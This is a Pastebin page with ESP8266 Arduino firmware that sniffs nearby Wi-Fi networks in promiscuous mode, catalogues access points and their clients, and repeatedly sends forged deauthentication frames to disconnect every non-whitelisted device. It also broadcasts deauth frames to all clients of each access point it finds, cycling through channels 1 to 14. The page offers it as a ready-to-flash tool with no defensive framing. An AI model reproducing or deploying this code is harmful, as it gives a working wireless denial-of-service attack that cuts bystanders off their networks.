API tools faq
paste
Advertisement
Guest User

732f4j5ds2

a guest
Apr 24th, 2018
85
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.54 KB | None | 0 0
raw download clone embed print report
  1. // Expose Espressif SDK functionality - wrapped in ifdef so that it still
  2. // compiles on other platforms
  3. #ifdef ESP8266
  4. extern "C" {
  5. #include "user_interface.h"
  6. }
  7. #endif
  8.  
  9. #include <ESP8266WiFi.h>
  10.  
  11. #define ETH_MAC_LEN 6
  12. #define MAX_APS_TRACKED 100
  13. #define MAX_CLIENTS_TRACKED 200
  14.  
  15. // Put Your devices here, system will skip them on deauth
  16. #define WHITELIST_LENGTH 2
  17. uint8_t whitelist[WHITELIST_LENGTH][ETH_MAC_LEN] = { { 0x77, 0xEA, 0x3A, 0x8D, 0xA7, 0xC8 }, { 0x40, 0x65, 0xA4, 0xE0, 0x24, 0xDF } };
  18.  
  19. // Declare to whitelist STATIONs ONLY, otherwise STATIONs and APs can be whitelisted
  20. // If AP is whitelisted, all its clients become automatically whitelisted
  21. //#define WHITELIST_STATION
  22.  
  23. // Channel to perform deauth
  24. uint8_t channel = 0;
  25.  
  26. // Packet buffer
  27. uint8_t packet_buffer[64];
  28.  
  29. // DeAuth template
  30. uint8_t template_da[26] = {0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x6a, 0x01, 0x00};
  31.  
  32. uint8_t broadcast1[3] = { 0x01, 0x00, 0x5e };
  33. uint8_t broadcast2[6] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
  34. uint8_t broadcast3[3] = { 0x33, 0x33, 0x00 };
  35.  
  36. struct beaconinfo
  37. {
  38. uint8_t bssid[ETH_MAC_LEN];
  39. uint8_t ssid[33];
  40. int ssid_len;
  41. int channel;
  42. int err;
  43. signed rssi;
  44. uint8_t capa[2];
  45. };
  46.  
  47. struct clientinfo
  48. {
  49. uint8_t bssid[ETH_MAC_LEN];
  50. uint8_t station[ETH_MAC_LEN];
  51. uint8_t ap[ETH_MAC_LEN];
  52. int channel;
  53. int err;
  54. signed rssi;
  55. uint16_t seq_n;
  56. };
  57.  
  58. beaconinfo aps_known[MAX_APS_TRACKED]; // Array to save MACs of known APs
  59. int aps_known_count = 0; // Number of known APs
  60. int nothing_new = 0;
  61. clientinfo clients_known[MAX_CLIENTS_TRACKED]; // Array to save MACs of known CLIENTs
  62. int clients_known_count = 0; // Number of known CLIENTs
  63.  
  64. bool friendly_device_found = false;
  65. uint8_t *address_to_check;
  66.  
  67. struct beaconinfo parse_beacon(uint8_t *frame, uint16_t framelen, signed rssi)
  68. {
  69. struct beaconinfo bi;
  70. bi.ssid_len = 0;
  71. bi.channel = 0;
  72. bi.err = 0;
  73. bi.rssi = rssi;
  74. int pos = 36;
  75.  
  76. if (frame[pos] == 0x00) {
  77. while (pos < framelen) {
  78. switch (frame[pos]) {
  79. case 0x00: //SSID
  80. bi.ssid_len = (int) frame[pos + 1];
  81. if (bi.ssid_len == 0) {
  82. memset(bi.ssid, '\x00', 33);
  83. break;
  84. }
  85. if (bi.ssid_len < 0) {
  86. bi.err = -1;
  87. break;
  88. }
  89. if (bi.ssid_len > 32) {
  90. bi.err = -2;
  91. break;
  92. }
  93. memset(bi.ssid, '\x00', 33);
  94. memcpy(bi.ssid, frame + pos + 2, bi.ssid_len);
  95. bi.err = 0; // before was error??
  96. break;
  97. case 0x03: //Channel
  98. bi.channel = (int) frame[pos + 2];
  99. pos = -1;
  100. break;
  101. default:
  102. break;
  103. }
  104. if (pos < 0) break;
  105. pos += (int) frame[pos + 1] + 2;
  106. }
  107. } else {
  108. bi.err = -3;
  109. }
  110.  
  111. bi.capa[0] = frame[34];
  112. bi.capa[1] = frame[35];
  113. memcpy(bi.bssid, frame + 10, ETH_MAC_LEN);
  114.  
  115. return bi;
  116. }
  117.  
  118. struct clientinfo parse_data(uint8_t *frame, uint16_t framelen, signed rssi, unsigned channel)
  119. {
  120. struct clientinfo ci;
  121. ci.channel = channel;
  122. ci.err = 0;
  123. ci.rssi = rssi;
  124. int pos = 36;
  125. uint8_t *bssid;
  126. uint8_t *station;
  127. uint8_t *ap;
  128. uint8_t ds;
  129.  
  130. ds = frame[1] & 3; //Set first 6 bits to 0
  131. switch (ds) {
  132. // p[1] - xxxx xx00 => NoDS p[4]-DST p[10]-SRC p[16]-BSS
  133. case 0:
  134. bssid = frame + 16;
  135. station = frame + 10;
  136. ap = frame + 4;
  137. break;
  138. // p[1] - xxxx xx01 => ToDS p[4]-BSS p[10]-SRC p[16]-DST
  139. case 1:
  140. bssid = frame + 4;
  141. station = frame + 10;
  142. ap = frame + 16;
  143. break;
  144. // p[1] - xxxx xx10 => FromDS p[4]-DST p[10]-BSS p[16]-SRC
  145. case 2:
  146. bssid = frame + 10;
  147. // hack - don't know why it works like this...
  148. if (memcmp(frame + 4, broadcast1, 3) || memcmp(frame + 4, broadcast2, 3) || memcmp(frame + 4, broadcast3, 3)) {
  149. station = frame + 16;
  150. ap = frame + 4;
  151. } else {
  152. station = frame + 4;
  153. ap = frame + 16;
  154. }
  155. break;
  156. // p[1] - xxxx xx11 => WDS p[4]-RCV p[10]-TRM p[16]-DST p[26]-SRC
  157. case 3:
  158. bssid = frame + 10;
  159. station = frame + 4;
  160. ap = frame + 4;
  161. break;
  162. }
  163.  
  164. memcpy(ci.station, station, ETH_MAC_LEN);
  165. memcpy(ci.bssid, bssid, ETH_MAC_LEN);
  166. memcpy(ci.ap, ap, ETH_MAC_LEN);
  167.  
  168. ci.seq_n = frame[23] * 0xFF + (frame[22] & 0xF0);
  169.  
  170. return ci;
  171. }
  172.  
  173. int register_beacon(beaconinfo beacon)
  174. {
  175. int known = 0; // Clear known flag
  176. for (int u = 0; u < aps_known_count; u++)
  177. {
  178. if (! memcmp(aps_known[u].bssid, beacon.bssid, ETH_MAC_LEN)) {
  179. known = 1;
  180. break;
  181. } // AP known => Set known flag
  182. }
  183. if (! known) // AP is NEW, copy MAC to array and return it
  184. {
  185. memcpy(&aps_known[aps_known_count], &beacon, sizeof(beacon));
  186. aps_known_count++;
  187.  
  188. if ((unsigned int) aps_known_count >=
  189. sizeof (aps_known) / sizeof (aps_known[0]) ) {
  190. Serial.printf("exceeded max aps_known\n");
  191. aps_known_count = 0;
  192. }
  193. }
  194. return known;
  195. }
  196.  
  197. int register_client(clientinfo ci)
  198. {
  199. int known = 0; // Clear known flag
  200. for (int u = 0; u < clients_known_count; u++)
  201. {
  202. if (! memcmp(clients_known[u].station, ci.station, ETH_MAC_LEN)) {
  203. known = 1;
  204. break;
  205. }
  206. }
  207. if (! known)
  208. {
  209. memcpy(&clients_known[clients_known_count], &ci, sizeof(ci));
  210. clients_known_count++;
  211.  
  212. if ((unsigned int) clients_known_count >=
  213. sizeof (clients_known) / sizeof (clients_known[0]) ) {
  214. Serial.printf("exceeded max clients_known\n");
  215. clients_known_count = 0;
  216. }
  217. }
  218. return known;
  219. }
  220.  
  221. void print_beacon(beaconinfo beacon)
  222. {
  223. if (beacon.err != 0) {
  224. //Serial.printf("BEACON ERR: (%d) ", beacon.err);
  225. } else {
  226. Serial.printf("BEACON: [%32s] ", beacon.ssid);
  227. for (int i = 0; i < 6; i++) Serial.printf("%02x", beacon.bssid[i]);
  228. Serial.printf(" %2d", beacon.channel);
  229. Serial.printf(" %4d\r\n", beacon.rssi);
  230. }
  231. }
  232.  
  233. void print_client(clientinfo ci)
  234. {
  235. int u = 0;
  236. int known = 0; // Clear known flag
  237. if (ci.err != 0) {
  238. } else {
  239. Serial.printf("CLIENT: ");
  240. for (int i = 0; i < 6; i++) Serial.printf("%02x", ci.station[i]);
  241. Serial.printf(" works with: ");
  242. for (u = 0; u < aps_known_count; u++)
  243. {
  244. if (! memcmp(aps_known[u].bssid, ci.bssid, ETH_MAC_LEN)) {
  245. Serial.printf("[%32s]", aps_known[u].ssid);
  246. known = 1;
  247. break;
  248. } // AP known => Set known flag
  249. }
  250. if (! known) {
  251. Serial.printf("%22s", " ");
  252. for (int i = 0; i < 6; i++) Serial.printf("%02x", ci.bssid[i]);
  253. }
  254.  
  255. Serial.printf("%5s", " ");
  256. for (int i = 0; i < 6; i++) Serial.printf("%02x", ci.ap[i]);
  257. Serial.printf("%5s", " ");
  258.  
  259. if (! known) {
  260. Serial.printf(" %3d", ci.channel);
  261. } else {
  262. Serial.printf(" %3d", aps_known[u].channel);
  263. }
  264. Serial.printf(" %4d\r\n", ci.rssi);
  265. }
  266. }
  267.  
  268. /* ==============================================
  269. Promiscous callback structures, see ESP manual
  270. ============================================== */
  271.  
  272. struct RxControl {
  273. signed rssi: 8;
  274. unsigned rate: 4;
  275. unsigned is_group: 1;
  276. unsigned: 1;
  277. unsigned sig_mode: 2;
  278. unsigned legacy_length: 12;
  279. unsigned damatch0: 1;
  280. unsigned damatch1: 1;
  281. unsigned bssidmatch0: 1;
  282. unsigned bssidmatch1: 1;
  283. unsigned MCS: 7;
  284. unsigned CWB: 1;
  285. unsigned HT_length: 16;
  286. unsigned Smoothing: 1;
  287. unsigned Not_Sounding: 1;
  288. unsigned: 1;
  289. unsigned Aggregation: 1;
  290. unsigned STBC: 2;
  291. unsigned FEC_CODING: 1;
  292. unsigned SGI: 1;
  293. unsigned rxend_state: 8;
  294. unsigned ampdu_cnt: 8;
  295. unsigned channel: 4;
  296. unsigned: 12;
  297. };
  298.  
  299. struct LenSeq {
  300. uint16_t length;
  301. uint16_t seq;
  302. uint8_t address3[6];
  303. };
  304.  
  305. struct sniffer_buf {
  306. struct RxControl rx_ctrl;
  307. uint8_t buf[36];
  308. uint16_t cnt;
  309. struct LenSeq lenseq[1];
  310. };
  311.  
  312. struct sniffer_buf2 {
  313. struct RxControl rx_ctrl;
  314. uint8_t buf[112];
  315. uint16_t cnt;
  316. uint16_t len;
  317. };
  318.  
  319.  
  320. /* Creates a packet.
  321.  
  322. buf - reference to the data array to write packet to;
  323. client - MAC address of the client;
  324. ap - MAC address of the acces point;
  325. seq - sequence number of 802.11 packet;
  326.  
  327. Returns: size of the packet
  328. */
  329. uint16_t create_packet(uint8_t *buf, uint8_t *c, uint8_t *ap, uint16_t seq)
  330. {
  331. int i = 0;
  332.  
  333. memcpy(buf, template_da, 26);
  334. // Destination
  335. memcpy(buf + 4, c, ETH_MAC_LEN);
  336. // Sender
  337. memcpy(buf + 10, ap, ETH_MAC_LEN);
  338. // BSS
  339. memcpy(buf + 16, ap, ETH_MAC_LEN);
  340. // Seq_n
  341. buf[22] = seq % 0xFF;
  342. buf[23] = seq / 0xFF;
  343.  
  344. return 26;
  345. }
  346.  
  347. /* Sends deauth packets. */
  348. void deauth(uint8_t *c, uint8_t *ap, uint16_t seq)
  349. {
  350. uint8_t i = 0;
  351. uint16_t sz = 0;
  352. for (i = 0; i < 0x10; i++) {
  353. sz = create_packet(packet_buffer, c, ap, seq + 0x10 * i);
  354. wifi_send_pkt_freedom(packet_buffer, sz, 0);
  355. delay(1);
  356. }
  357. }
  358.  
  359. void promisc_cb(uint8_t *buf, uint16_t len)
  360. {
  361. int i = 0;
  362. uint16_t seq_n_new = 0;
  363. if (len == 12) {
  364. struct RxControl *sniffer = (struct RxControl*) buf;
  365. } else if (len == 128) {
  366. struct sniffer_buf2 *sniffer = (struct sniffer_buf2*) buf;
  367. struct beaconinfo beacon = parse_beacon(sniffer->buf, 112, sniffer->rx_ctrl.rssi);
  368. if (register_beacon(beacon) == 0) {
  369. print_beacon(beacon);
  370. nothing_new = 0;
  371. }
  372. } else {
  373. struct sniffer_buf *sniffer = (struct sniffer_buf*) buf;
  374. //Is data or QOS?
  375. if ((sniffer->buf[0] == 0x08) || (sniffer->buf[0] == 0x88)) {
  376. struct clientinfo ci = parse_data(sniffer->buf, 36, sniffer->rx_ctrl.rssi, sniffer->rx_ctrl.channel);
  377. if (memcmp(ci.bssid, ci.station, ETH_MAC_LEN)) {
  378. if (register_client(ci) == 0) {
  379. print_client(ci);
  380. nothing_new = 0;
  381. }
  382. }
  383. }
  384. }
  385. }
  386.  
  387. bool check_whitelist(uint8_t *macAdress){
  388. unsigned int i=0;
  389. for (i=0; i<WHITELIST_LENGTH; i++) {
  390. if (! memcmp(macAdress, whitelist[i], ETH_MAC_LEN)) return true;
  391. }
  392. return false;
  393. }
  394.  
  395. void setup() {
  396. Serial.begin(115200);
  397. Serial.printf("\n\nSDK version:%s\n", system_get_sdk_version());
  398.  
  399. // Promiscuous works only with station mode
  400. wifi_set_opmode(STATION_MODE);
  401.  
  402. // Set up promiscuous callback
  403. wifi_set_channel(1);
  404. wifi_promiscuous_enable(0);
  405. wifi_set_promiscuous_rx_cb(promisc_cb);
  406. wifi_promiscuous_enable(1);
  407. }
  408.  
  409. void loop() {
  410. while (true) {
  411.  
  412. channel = 1;
  413. wifi_set_channel(channel);
  414. while (true) {
  415. nothing_new++;
  416. if (nothing_new > 200) {
  417. nothing_new = 0;
  418.  
  419. wifi_promiscuous_enable(0);
  420. wifi_set_promiscuous_rx_cb(0);
  421. wifi_promiscuous_enable(1);
  422. for (int ua = 0; ua < aps_known_count; ua++) {
  423. if (aps_known[ua].channel == channel) {
  424. for (int uc = 0; uc < clients_known_count; uc++) {
  425. if (! memcmp(aps_known[ua].bssid, clients_known[uc].bssid, ETH_MAC_LEN)) {
  426. #ifdef WHITELIST_STATION
  427. address_to_check = clients_known[uc].station;
  428. #else
  429. address_to_check = clients_known[uc].ap;
  430. #endif
  431. if (check_whitelist(address_to_check)) {
  432. friendly_device_found = true;
  433. Serial.print("Whitelisted -->");
  434. print_client(clients_known[uc]);
  435. } else {
  436. Serial.print("DeAuth to ---->");
  437. print_client(clients_known[uc]);
  438. deauth(clients_known[uc].station, clients_known[uc].bssid, clients_known[uc].seq_n);
  439. }
  440. break;
  441. }
  442. }
  443. if (!friendly_device_found) deauth(broadcast2, aps_known[ua].bssid, 128);
  444. friendly_device_found = false;
  445. }
  446. }
  447. wifi_promiscuous_enable(0);
  448. wifi_set_promiscuous_rx_cb(promisc_cb);
  449. wifi_promiscuous_enable(1);
  450.  
  451. channel++;
  452. if (channel == 15) break;
  453. wifi_set_channel(channel);
  454. }
  455. delay(1);
  456.  
  457. if ((Serial.available() > 0) && (Serial.read() == '\n')) {
  458. Serial.println("\n-------------------------------------------------------------------------\n");
  459. for (int u = 0; u < aps_known_count; u++) print_beacon(aps_known[u]);
  460. for (int u = 0; u < clients_known_count; u++) print_client(clients_known[u]);
  461. Serial.println("\n-------------------------------------------------------------------------\n");
  462. }
  463. }
  464. }
  465. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!